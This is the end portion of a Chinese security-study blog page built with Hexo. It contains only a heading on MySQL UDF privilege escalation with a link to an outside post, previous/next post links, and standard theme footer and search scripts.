<h4 id="2、udf提权"><a href="#2、udf提权" class="headerlink" title="2、udf提权"></a>2、udf提权</h4><blockquote>
<p>优秀博客：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/litlife/p/9030673.html">https://www.cnblogs.com/litlife/p/9030673.html</a></p>
</blockquote>

                
<p class="pink-link-context">
    <a href="/2020/09/30/%E9%98%B6%E6%AE%B5%E5%9B%9B%E3%80%81Web%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E7%9F%A5%E8%AF%86%E7%82%B9/" rel="next" title="内网渗透知识点">
    上一篇：内网渗透知识点
  </a>
</p>



<p class="pink-link-context">
    <a href="/2020/09/25/%E9%98%B6%E6%AE%B5%E4%B8%89%E3%80%81%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%AE%89%E5%85%A8/10%E3%80%81PHP%E5%B8%B8%E8%A7%81%E5%87%BD%E6%95%B0/" rel="next" title="10、PHP常见函数">
    下一篇：10、PHP常见函数
  </a>
</p>


            </div>
			
        </div>
    </div>
</article>






</div>

        <div class="fixed-action-btn float-sitemap">
    <a class="btn-floating btn-large pink">
      <i class="fa fa-caret-square-o-up"></i>
    </a>
    <ul>
      <li><a class="btn-return-top btn-floating waves-effect green" title="回到顶部"><i class="fa fa-arrow-circle-o-up"></i></a></li>
      <li><a class="btn-floating waves-effect button-collapse yellow darken-1"  data-activates="main-menu" title="菜单"><i class="fa fa-navicon"></i></a></li>
    </ul>
  </div>

    </main>
    <footer class="page-footer indigo darken-1">
    
    <div class="footer-container container">
        <div class="row">
            
            <div class="social-group col m4 s12">
                <h5 class="white-text">社交</h5>
                
                    <a class="social-link" href="http://weibo.com/1956184117" target="_blank">
                        <i class="fa fa-2x fa-weibo"></i>
                    </a>
                
                    <a class="social-link" href="https://github.com/raytaylorlin" target="_blank">
                        <i class="fa fa-2x fa-github"></i>
                    </a>
                
                    <a class="social-link" href="/atom.xml" target="_blank">
                        <i class="fa fa-2x fa-rss"></i>
                    </a>
                
                

            </div>
            

            
            <div class="col m8 s12">
                <h5 class="white-text">友情链接</h5>
                
                    <a class="social-link" href="http://raytaylorlin.com/" target="_blank">raytaylorism主题作者的技术博客</a>
                
                    <a class="social-link" href="https://github.com/raytaylorlin" target="_blank">Github地址（测试友情链接）</a>
                
            </div>
            
        </div>
    </div>
    

    <div class="footer-copyright pink-link-context">
        <div class="container">
            © 2016 example.com, All rights reserved.
            <p class="right" style="margin-top: 0;">本博客由 <a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a> 强力驱动 | 主题 <a target="_blank" rel="noopener" href="https://github.com/raytaylorlin/hexo-theme-raytaylorism">raytaylorism</a></p>
        </div>
    </div>
</footer>


    <noscript>
    <div class="noscript">
        <p class="center-align">当前网速较慢或者你使用的浏览器不支持博客特定功能，请尝试刷新或换用Chrome、Firefox等现代浏览器</p>
    </div>
</noscript>
<div class="noscript">
    <p class="center-align">当前网速较慢或者你使用的浏览器不支持博客特定功能，请尝试刷新或换用Chrome、Firefox等现代浏览器</p>
</div>


<script src="/js/jquery.min.js"></script>
<script src="/js/materialize.min.js"></script>

<script>
    (function($) {
        $(document).ready(function() {
            // 隐藏禁用javascript（针对微信内置浏览器）的提示
            $('.noscript').hide();

            // 图片缩放效果
            var $imgs = $('img').not('.slider-image').not('.avatar-image').not('.carousel-image').not('.card-cover-image').not('.qrcode');

            // 给图片加上点击放大效果（materialbox插件）
            $imgs.addClass('materialboxed').each(function(i, el) {
                $(this).attr('data-caption', $(this).attr('alt') || ' ');
            }).materialbox();

            // 优化表格的显示
            $('table').each(function() {
                var $table = $(this);
                // 除去多行代码的情况
                if ($table.find('pre').length == 0) {
                    $table.addClass('responsive-table striped bordered');
                }
            });

            // 首页幻灯片
            $('.slider').slider({indicators: true, full_width: true, interval: 8000});

            $(".button-collapse").sideNav();
            $(".category-menu").sideNav();

            // 针对gallery post
            $('.carousel').carousel({full_width: true});
            $('.carousel-control.prev').click(function() {
                $('.carousel').carousel('prev');
            });
            $('.carousel-control.next').click(function() {
                $('.carousel').carousel('next');
            });

            // 文章目录
            $('article').not('.simple-article').find('h1').add('h2').add('h3').add('h4').add('h5').add('h6').scrollSpy();

            // 目录随屏幕滚动（防止目录过长越过footer）
            var $toc = $('.toc');
            var scrollTargetTop = 0;
            $(window).scroll(function() {
                var $activeLink = $toc.find('a.active.section');
                if ($(window).scrollTop() < 100) {
                    scrollTargetTop = 0;
                } else {
                    if ($activeLink[0]) {
                        scrollTargetTop = $activeLink.offset().top - $toc.offset().top;
                    }
                }
                $toc.css('top', '-' + scrollTargetTop + 'px');
            });

            // 修正文章目录的left-border颜色
            var color = $('.table-of-contents-text').css('color');
            $('.table-of-contents-link').css('border-left-color', color);

            // 针对移动端做的优化：FAB按钮点击一下收回
            if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
                $('.fixed-action-btn').addClass('click-to-toggle');
            }
            // 回到顶部
            $('.btn-return-top').click(function() {
                $('body, html').animate({
                    scrollTop: 0
                }, 500);
            });

            // 重置读书页面的Tab标签页的颜色
            $('li.tab a').hover(function() {
                $(this).toggleClass('text-lighten-4');
            });
            $('.indicator').addClass('pink lighten-2');

            
            // 添加new标签
            $('').append('<span class="new badge pink"></span>');
            

            // 搜索功能
            $('.modal-trigger').leanModal({
                // 打开搜索框时自动聚焦
                ready: function() {
                    if ($('#search').is(":visible")) {
                        $('#search-input').focus();
                    }
                }
            });
            var searchXml = "search.xml";
            if (searchXml.length == 0) {
             	searchXml = "search.xml";
            }
            var searchPath = "/" + searchXml;
            initSearch(searchPath, 'search-input', 'search-result');
        });

        // 初始化搜索与匹配函数
        var initSearch = function(path, search_id, content_id) {
            'use strict';
            $.ajax({
                url: path,
                dataType: "xml",
                success: function(xmlResponse) {
                    // get the contents from search data
                    var datas = $("entry", xmlResponse).map(function() {
                        return {
                            title: $("title", this).text(),
                            content: $("content", this).text(),
                            url: $("url", this).text()
                        };
                    }).get();
                    var $input = document.getElementById(search_id);
                    var $resultContent = document.getElementById(content_id);
                    $input.addEventListener('input', function() {
                        var str = '<ul class=\"search-result-list\">';
                        var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                        $resultContent.innerHTML = "";
                        if (this.value.trim().length <= 0) {
                            return;
                        }
                        // perform local searching
                        datas.forEach(function(data) {
                            var isMatch = true;
                            var content_index = [];
                            var data_title = data.title.trim().toLowerCase();
                            var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                            var data_url = data.url;
                            var index_title = -1;
                            var index_content = -1;
                            var first_occur = -1;
                            // only match artiles with not empty titles and contents
                            if (data_title != '' && data_content != '') {
                                keywords.forEach(function(keyword, i) {
                                    index_title = data_title.indexOf(keyword);
                                    index_content = data_content.indexOf(keyword);
                                    if (index_title < 0 && index_content < 0) {
                                        isMatch = false;
                                    } else {
                                        if (index_content < 0) {
                                            index_content = 0;
                                        }
                                        if (i == 0) {
                                            first_occur = index_content;
                                        }
                                    }
                                });
                            }
                            // show search results
                            if (isMatch) {
                                keywords.forEach(function(keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    data_title = data_title.replace(regS, "<span class=\"search-keyword pink lighten-2\">" + keyword + "</span>");
                                });

                                str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                                var content = data.content.trim().replace(/<[^>]+>/g, "");
                                if (first_occur >= 0) {
                                    // cut out 100 characters
                                    var start = first_occur - 20;
                                    var end = first_occur + 80;
                                    if (start < 0) {
                                        start = 0;
                                    }
                                    if (start == 0) {
                                        end = 100;
                                    }
                                    if (end > content.length) {
                                        end = content.length;
                                    }
                                    var match_content = content.substring(start, end);
                                    // highlight all keywords
                                    keywords.forEach(function(keyword) {
                                        var regS = new RegExp(keyword, "gi");
                                        match_content = match_content.replace(regS, "<span class=\"search-keyword pink lighten-2\">" + keyword + "</span>");
                                    });

                                    str += "<p class=\"search-result\">..." + match_content + "...</p>"
                                }
                                str += "</li>";
                            }
                        });
                        str += "</ul>";
                        $resultContent.innerHTML = str;
                    });
                }
            });
        }
    })(jQuery);
</script>


<script src="/js/prettify.js"></script>
<script type="text/javascript">
    $(document).ready(function() {
        $("pre").addClass("prettyprint");
        prettyPrint();
    });
</script>






<script type="text/x-mathjax-config">
MathJax.Hub.Config({
  tex2jax: {inlineMath: [['$','$'], ['\\(','\\)']]}
});
</script>
<script type="text/javascript" async
  src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-MML-AM_CHTML">
</script>



</body>
</html>
